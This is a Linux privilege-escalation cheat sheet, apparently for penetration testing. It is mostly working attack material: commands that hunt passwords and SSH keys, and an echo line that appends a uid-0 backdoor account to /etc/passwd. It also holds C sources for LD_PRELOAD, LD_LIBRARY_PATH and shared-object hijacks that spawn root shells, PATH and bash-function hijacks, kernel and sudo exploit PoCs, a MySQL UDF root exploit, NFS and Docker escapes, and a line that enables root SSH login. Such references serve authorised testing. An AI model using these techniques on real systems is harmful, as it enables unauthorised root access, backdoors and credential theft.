
Linux

Tools

  • LinPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
  • LinEnum: https://github.com/rebootuser/LinEnum
  • Linux exploit suggester: https://github.com/mzet-/linux-exploit-suggester
  • LinuxPrivChecker: https://github.com/sleventyeleven/linuxprivchecker
  • PsPy : https://github.com/DominicBreuker/pspy
  • GTFObins : https://gtfobins.github.io/

User enumeration

whoami
id
sudo -l
cat /etc/passwd

System enumeration

hostname
uname -a
cat /proc/version
cat /etc/issue # Distribution
lscpu # Arch
ps aux | grep root
cat /etc/*-release
ldd --version # glibc version

Network enumeration

ip a
ifconfig
iwconfig
ip route
route
arp -a
ip neigh
netstat -ano
netstat -tunlp
sockstat # FreeBSD
sockstat -4l # FreeBSD, only IPv4

Account lockout

grep tally /etc/pam.d/*
grep tally /etc/pam.conf

Escape restricted shells

  • https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=6

Password Hunting

Keywords to try : pass, secret, key...

find . # From user, opt or web server directories
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2>/dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
find / -name *.txt 2>/dev/null
SSH
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
History files
cat ~/.*history | less
Also take a look at config files.

Weak File Permissions

Shadow file : if readable, crack the hashes; if writable, generate a password hash, replace root's hash in the shadow file, then su root.

ls -l /etc/shadow
cat /etc/shadow 
mkpasswd -m sha-512

Passwd file : if writable, generate a password hash, replace the "x" in the second field of an entry with that hash, then su root.

ls -l /etc/passwd
openssl passwd newpasswordhere


echo newroot:YiV30ZoQz25SA:0:0:root:/root:/bin/bash >> /etc/passwd
# Connect using newroot:pentest

Lib directories : if /lib or /usr/lib is writable, a crafted libcustom library can be dropped in place of the original; when /usr/bin/myexec runs, the malicious library is loaded instead.

ls -l /lib
ls -l /usr/lib

Kernel Exploits

  • https://github.com/lucyoa/kernel-exploits

# Google is your friend
./linux-exploit-suggester.sh
./linux-exploit-suggester.sh --checksec
./linux-exploit-suggester.sh --uname <uname-string>
MSF
post/multi/recon/local_exploit_suggester

Dirty Cow :

  • https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs.
  • https://github.com/dirtycow/dirtycow.github.io/wiki/Patched-Kernel-Versions
  • Binary should be compiled on the target.
gcc -pthread c0w.c -o c0w
./c0w
passwd

Dirty Pipe CVE-2022-0847 - Linux kernel >= 5.8 and < 5.16.11 :

  • https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
  • https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

Sudo

sudo -l # GTFObins AND Google are your friends

Sudo can be configured to pass certain environment variables through to the command it runs; check the sudoers file for env_keep+= entries.

  • LD_PRELOAD specifies a library which will be loaded prior to any other library when the program gets executed.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

/*
 * Legacy ELF initializer: the dynamic loader runs _init when this shared
 * object is mapped, i.e. before the preloaded program's own main(). The
 * -nostartfiles flag in the accompanying build line keeps the toolchain's
 * own _init out of the link. This code is only reached if the sudoers
 * policy explicitly keeps LD_PRELOAD (env_keep); sudo's default
 * environment reset drops it.
 */
void _init() {
    /* Drop LD_PRELOAD so the shell spawned below does not reload this library. */
    unsetenv("LD_PRELOAD");
    /* Adopt gid/uid 0; only succeeds when the hosting process already runs as root. */
    setgid(0);
    setuid(0);
    /* Replace the intended command with an interactive shell. */
    system("/bin/bash");
}
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
sudo LD_PRELOAD=/tmp/preload.so <sudo-binary>
  • LD_LIBRARY_PATH indicates an additional directory to search for libraries.
#include <stdio.h>
#include <stdlib.h>

/*
 * Marked as a constructor so the loader calls it as soon as the library is
 * mapped. The library is found only because LD_LIBRARY_PATH (kept by an
 * env_keep entry in sudoers, see the section text) points at a directory
 * holding a file named like one of the program's real dependencies.
 */
static void hijack() __attribute__((constructor));

void hijack() {
        /* Drop LD_LIBRARY_PATH so the spawned shell resolves libraries normally. */
        unsetenv("LD_LIBRARY_PATH");
        /* Set real, effective and saved UID to 0; requires the process to already hold root privileges. */
        setresuid(0,0,0);
        /* -p (privileged mode) keeps bash from resetting its effective UID to the real UID. */
        system("/bin/bash -p");
}
ldd /usr/sbin/binary # check shared libraries used by the program
gcc -o /tmp/lib_name.so.1 -shared -fPIC /tmp/library_path.c # create a shared object with the same name as one of the listed libraries (lib_name.so.1)
sudo LD_LIBRARY_PATH=/tmp binary # set the LD_LIBRARY_PATH environment variable to /tmp (where the compiled shared object was put)
  • Sudo 1.8.2 - 1.8.31p2 & 1.9.0 - 1.9.5p1 (Baron Samedit, CVE-2021-3156) : https://github.com/worawit/CVE-2021-3156 or https://github.com/blasty/CVE-2021-3156
# PoC
sudoedit -s '\' `perl -e 'print "A" x 65536'`
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
  • Sudo < 1.8.27 Security Bypass (!root), CVE-2019-14287 : https://www.exploit-db.com/exploits/47502
sudo -u#-1 <command>
sudo -u#-1 /bin/bash
  • Sudo < 1.8.26 Buffer Overflow (pwfeedback) / CVE-2019-18634 : https://github.com/saleemrashid/sudo-cve-2019-18634

pwfeedback is the sudoers option that prints a '*' for each character typed at the sudo password prompt.

cat /etc/sudoers # The buffer overflow is possible if pwfeedback is set in /etc/sudoers
gcc exploit.c -o exploit

SUID / SGID

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
  • Look on GTFOBins : https://gtfobins.github.io/
  • Look for known exploits

  • Shared object injection

# search for .so file loaded in a writable directory
strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"   
#include <stdio.h>
#include <stdlib.h>

/*
 * Constructor: runs when the SUID binary loads this shared object. It is
 * picked up only because the binary's library search (see the strace line
 * above) reaches a user-writable directory; shipping every loaded library
 * from a root-owned path closes this.
 */
static void inject() __attribute__((constructor));

void inject(){
    /* Copy bash, mark it setuid/setgid, and run it in privileged mode so the root EUID is kept. */
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
gcc -shared -fPIC -o /home/user/.config/lib.so /home/user/.config/lib.c

  • If a SUID program runs another binary without an absolute path, the lookup uses the caller's PATH environment variable, so a writable directory placed first in PATH decides which binary gets executed :
strings /usr/bin/suid-program # identify binary without full path inside

type binary # not built-in

export PATH=/tmp:$PATH
echo "/bin/sh -p" > /tmp/binary
chmod +x /tmp/binary

/usr/bin/suid-program
  • Abusing shell features, bash < 4.2-048 :

In Bash versions < 4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.

/bin/bash --version

strings /usr/local/bin/suid-program # identify the absolute path of the executable (/usr/sbin/service)

function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service

/usr/local/bin/suid-program
  • Abusing shell features, bash < 4.4 :

When xtrace debugging is enabled, Bash expands the PS4 environment variable as the prefix printed before each traced command, so command substitutions inside it are executed.

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/tmp/rootbash -p
  • PwnKit CVE-2021-4034 : https://github.com/ly4k/PwnKit
./PwnKit id
./Pwnkit # interactive shell

Crontab

PsPy is your friend.

cat /etc/crontab

Check for:

  • File permissions
find / -name program.sh
ls -l /path/to/program.sh
  • PATH : if the crontab's PATH contains a writable directory that is searched before the real program's location, create the program there and make it executable.

  • Wildcards (*)

  • Search exploits on commands running as root

Capabilities

getcap -r / 2>/dev/null
# /usr/bin/python2.6 = cap_setuid+ep

/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Interesting capabilities are (e = effective, p = permitted): `=ep` with no capability named = the binary has every capability; `cap_dac_read_search` = read any file regardless of permissions; `cap_setuid+ep` = the binary can change its UID.

Localhost services

Forward local port 8888 through an SSH tunnel to remote port 5901, a service bound to the remote host's localhost only.

netstat -tunlp # Notice localhost service
ssh -L 8888:127.0.0.1:5901 user@10.10.10.10

MySQL service

  • If the MySQL service runs as root and the service's "root" account has no password assigned, a User Defined Function (UDF) can be used to run commands as root.
ps aux | grep root
mysql -u root [-p pass]
  • enumerate FILE permission, version and plugin_dir
# look privileges 
SHOW Grants;

# look at variables including hostname, plugin_dir, tmpdir, version, version_compile_machine 
show variables;
show variables where (Variable_name="hostname" or Variable_name="plugin_dir" or Variable_name="version" or Variable_name="tmpdir" or Variable_name="version_compile_machine");

Exploit : https://www.exploit-db.com/exploits/1518

  • Compile
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
  • Connect to mysql and create a User Defined Function (UDF) "do_system" :
    • In MySQL versions prior to 4.1.25 / 5.0.67, the .so file must be in a directory that is searched by your system’s dynamic linker.
    • Otherwise the .so file must be located in the plugin directory. If no plugin_dir is set, the previous behavior applies.
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

exit

/tmp/rootbash -p

NFS root squashing

  • Files created over NFS keep the remote user's UID. If that user is root and root squashing is enabled, the UID is instead mapped to the "nobody" user.
  • https://book.hacktricks.xyz/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
# On victim machine, notice the /shared export has root squashing disabled
cat /etc/exports

# On attacking machine
# remote check the name of the folder
showmount -e $IP

# create dir
mkdir /tmp/nfsdir  

# mount directory 
mount -t nfs $IP:/shared /tmp/nfsdir [OR] mount -o rw,vers=2 $IP:/shared /tmp/nfsdir
cd /tmp/nfsdir

# copy wanted shell 
cp /bin/bash .  

# set suid permission on it
chmod +s bash 

# On victim machine, run bash
/shared/bash -p

Docker

id  # docker group
find / -name docker.sock 2>/dev/null    # /run/docker.sock
docker images   # repository bash
docker run -it -v /:/host/ bash chroot /host/ bash

Other

screen -r session_name/
tmux attach-s -t session_name

EUID to UID root

python -c 'import pty; import os; os.setuid(0); pty.spawn("/bin/bash")'

Allow root login over SSH with a password

echo PermitRootLogin yes >> /etc/ssh/sshd_config
sudo service ssh restart